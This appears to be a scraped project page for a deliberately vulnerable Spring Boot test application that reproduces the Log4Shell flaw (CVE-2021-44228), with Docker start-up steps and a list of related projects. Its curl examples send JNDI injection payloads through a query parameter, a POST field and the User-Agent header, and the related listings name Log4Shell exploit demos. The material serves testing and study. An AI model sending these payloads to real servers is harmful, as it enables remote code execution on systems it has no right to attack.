基于 spring-boot-starter-log4j2:2.6.1 (log4j 2.14.1)

Last update: Mar 23, 2022

Overview

Log4j 2 CVE-2021-44228 测试样本应用

基于 spring-boot-starter-log4j2:2.6.1 (log4j 2.14.1)

可用接口

接口	请求方法	参数
`vulnerable_request_get`	GET	v=payload
`vulnerable_request_post`	POST	v=payload
`vulnerable_request_header_ua`	GET / POST	Header `User-Agent`

测试可用

$ curl 'http://[targetIP]:8080/vulnerable_request_get?v=%24%7Bjndi%3Aldap%3A%2F%2F127.0.0.1%2Ffake%7D'
{"method":"vulnerable_request_get","payload":"${jndi:ldap://127.0.0.1/fake}"}

POST

$ curl -X POST -F 'v=${jndi:ldap://127.0.0.1/fake}' 'http://[targetIP]:8080/vulnerable_request_post'
{"method":"vulnerable_request_post","payload":"${jndi:ldap://127.0.0.1/fake}"}

UserAgent

$ curl 'http://[targetIP]:8080/vulnerable_request_header_ua' --user-agent '${jndi:ldap://127.0.0.1/fake}'
{"method":"vulnerable_request_header_ua","payload":"${jndi:ldap://127.0.0.1/fake}"}

快速启动

docker run -p 8080:8080 ghcr.io/zzzz0317/log4j2-vulnerable-spring-app:latest

注：当前镜像基于 openjdk:8u111-jdk

构建镜像

docker build -t log4j2-vulnerable-spring-app:latest .
docker run -p 8080:8080 log4j2-vulnerable-spring-app:latest

Spring Boot starter for JustAuth Plus.

Jun 23, 2022

An awesome Spring Boot Starter!

spring-boot-tony-starter An awesome Spring Boot Starter! Explore the docs » View Demo · Report Bug · Request Feature Table of Contents About The Proje

Sep 13, 2022

Create your Java crypto trading bot in minutes. Our Spring boot starter takes care of exchange connections, accounts, orders, trades, and positions so you can focus on building your strategies.

Quick Start | Documentation | Discord | Twitter Create and run your java crypto trading bot in minutes Our Spring boot starter takes care of exchange

Jan 3, 2023

Get or Throw Spring boot Starter will help you to hide handling if entity not found.

Get or Throw Spring boot Starter Get or Throw Spring boot Starter will help you to hide handling if entity not found. 1. Setup 2. Usage Library adds c

Feb 2, 2022

Spring Boot Log4j - CVE-2021-44228 Docker Lab

Spring Boot Log4j - CVE-2021-44228 The Log4Shell vulnerability (CVE-2021-44228) ultimately is a quite simple JNDI Injection flaw, but in a really real

Jun 10, 2022

Spring Boot Login and Registration example with MySQL, JWT, Rest Api - Spring Boot Spring Security Login example

Spring Boot Login example with Spring Security, MySQL and JWT Appropriate Flow for User Login and Registration with JWT Spring Boot Rest Api Architect

Jan 5, 2023

本项目基于springboot进行开发，实现了一系列的spring-boot-starter

项目简介本项目基于springboot进行开发，实现了一系列的spring-boot-starter，可以作为开发中的工具包进行使用。模块划分 common-spring-boot-starter：常用的基础类，比如用作消息流转的Msg以及一些工具类 monitor-spring-boot-st

Jan 24, 2022

Apache Log4j2 CVE-2021-44228 RCE Demo with RMI and LDAP

CVE-2021-44228-Demo 利用 CVE-2021-44228，通过 RMI 和 LDAP 两种方式远程注入代码的示例。 Exploit class from RMI Server loaded Hello, ${jndi:rmi://127.0.0.1:1099/exploit} Ex

Dec 14, 2021

log4j2 Log4Shell CVE-2021-44228 proof of concept

Log4Shell CVE-2021-44228 proof of concept Requirement Java (JDK/JRE) 8 or later version curl exploitable Simple spring boot application that serves a

Dec 21, 2021

基于 spring-boot-starter-log4j2:2.6.1 (log4j 2.14.1)

Related tags

Overview

Log4j 2 CVE-2021-44228 测试样本应用

可用接口

测试可用

快速启动

构建镜像

You might also like...

Spring Boot starter for JustAuth Plus.

An awesome Spring Boot Starter!

Create your Java crypto trading bot in minutes. Our Spring boot starter takes care of exchange connections, accounts, orders, trades, and positions so you can focus on building your strategies.

Get or Throw Spring boot Starter will help you to hide handling if entity not found.

Spring Boot Log4j - CVE-2021-44228 Docker Lab

Spring Boot Login and Registration example with MySQL, JWT, Rest Api - Spring Boot Spring Security Login example

本项目基于springboot进行开发，实现了一系列的spring-boot-starter

Apache Log4j2 CVE-2021-44228 RCE Demo with RMI and LDAP

log4j2 Log4Shell CVE-2021-44228 proof of concept

Releases(v1.0)

v1.0(Dec 11, 2021)

Owner

Zhangzhe

循序渐进，学习Spring Boot、Spring Boot & Shiro、Spring Batch、Spring Cloud、Spring Cloud Alibaba、Spring Security & Spring Security OAuth2，博客Spring系列源码：https://mrbird.cc

A springboot-starter that can achieve Intranet penetration. 一款可以实现内网穿透的springboot-starter。

A springboot-starter that can achieve Intranet penetration. 一款可以实现内网穿透的springboot-starter。

Kafka-spring-boot-starter: encapsulated based on spring-kafka

log4j-scanner is a project derived from other members of the open-source community by CISA's Rapid Action Force team to help organizations identify potentially vulnerable web services affected by the log4j vulnerabilities.

Oxygen-log4j-patcher - A tool that upgrades the log4j from an Oxygen installation to version 2.16

Log4j-payload-generator - Log4j jndi injects the Payload generator

Spring Boot starter module for gRPC framework.

Spring Boot starter module for gRPC framework.

tuya-spring-boot-starter helps you efficiently create cloud development projects regarding the OpenAPI or message subscription capabilities. You can put all the focus on business logic without taking care of server-side programming nor relational databases.